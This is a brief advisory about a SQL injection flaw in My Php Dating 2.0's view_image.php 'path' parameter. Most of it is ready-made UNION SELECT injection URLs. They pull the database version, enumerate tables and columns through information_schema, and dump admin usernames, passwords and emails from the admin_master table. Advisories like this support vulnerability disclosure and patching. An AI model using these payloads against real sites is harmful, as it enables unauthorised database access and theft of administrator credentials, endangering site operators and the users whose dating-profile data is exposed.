My Php Dating 2.0 – SQL Injection Web Vulnerability
My Php Dating 2.0 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the application. This can be done by sending a crafted URL to the application. For example, http://localhost/[PATH]/view_image.php?path=-124 union select 1,version(),3,4,5,6,7,8,9 can be used to extract the version of the database. Similarly, http://localhost/[PATH]/view_image.php?path=-124+union+select+1,group_concat(admin_id,admin_uname,admin_pass,admin_email),3,4,5,6,7,8,9+from+admin_master-- can be used to extract the admin credentials. http://localhost/[PATH]/view_image.php?path=-124+union+select+1,group_concat(column_name),3,4,5,6,7,8,9+from+information_schema.columns+where+table_schema=database()-- can be used to extract the column names and http://localhost/[PATH]/view_image.php?path=-124+union+select+1,group_concat(table_name),3,4,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()-- can be used to extract the table names.